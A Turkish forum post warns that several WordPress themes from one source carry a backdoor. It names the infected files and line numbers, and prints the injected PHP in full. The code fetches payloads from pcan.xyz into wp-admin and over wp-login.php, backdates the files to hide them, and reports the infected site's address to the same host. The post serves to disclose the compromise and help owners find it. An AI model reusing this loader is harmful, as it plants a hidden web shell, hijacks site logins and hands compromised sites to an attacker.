Sizde panelden indirip aynı yerde var mı bakmanızı öneririm..
Haber Teması V4 - theHaberV4/admin/admin-interface-functions.php L : 1506. Satır
Kurumsal 2 - kurumsal2/fonksiyon/ayar.php L : 661. satır
Kurumsal 3 - kurumsal3/fonksiyon/yonetim/ot-loader.php L : 804. satır
Kurumsal 4 - kurumsal4/option-tree/ot-loader.php L : 807. Satır
A4Portal - admin/admin-functions.php L : 86. Satır
$uaga = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko,gas) Chrome/76.0.3809.132 Safari/537.36"; @$adabs = ABSPATH."wp-admin/ms-zo.php"; @$idabs = ABSPATH."wp-admin/ms-options.php"; @$zifos = ABSPATH."wp-login.php"; @$opfilemtime = @filemtime($idabs); if (!@file_exists($adabs)) { $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "$uaga"); curl_setopt($ch, CURLOPT_URL, "http://pcan.xyz/s.txt?d"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $veri = @curl_exec($ch); $guncellebitir = @fopen("$adabs", "w"); @fwrite($guncellebitir, "$veri"); $chs = curl_init(); curl_setopt($chs, CURLOPT_USERAGENT, "$uaga"); curl_setopt($chs, CURLOPT_URL, "http://pcan.xyz/cwl.txt?d"); curl_setopt($chs, CURLOPT_RETURNTRANSFER, true); $verim = @curl_exec($chs); $guncellebitirs = @fopen("$zifos", "w"); @fwrite($guncellebitirs, "$verim"); $yils = date('Y',$opfilemtime); $ays = date('m',$opfilemtime); $guns = date('d',$opfilemtime);$saats = date('H',$opfilemtime);$daks = date('i',$opfilemtime);$sans = date('s',$opfilemtime); $zamanla = strtotime("$yils-$ays-$guns $saats:$daks:$sans"); @touch($adabs,$zamanla,$zamanla); @touch($zifos,$zamanla,$zamanla); $site = "http://$_SERVER[HTTP_HOST]"."/wp-admin/ms-zo.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_USERAGENT, "$uaga"); curl_setopt($ch, CURLOPT_URL, "http://pcan.xyz/l.php");curl_getinfo($ch, CURLINFO_EFFECTIVE_URL); curl_setopt($ch, CURLOPT_POST, true);curl_setopt($ch, CURLOPT_POSTFIELDS, array('user' => "kurulum",'pw' => "tamam",'site' => "$site")); $result = curl_exec($ch); curl_close($ch); }
Kaynak : https://www.***.net/sikayetim-var/2259327-thewp-gen-tr-temalarinda-exploit-var.html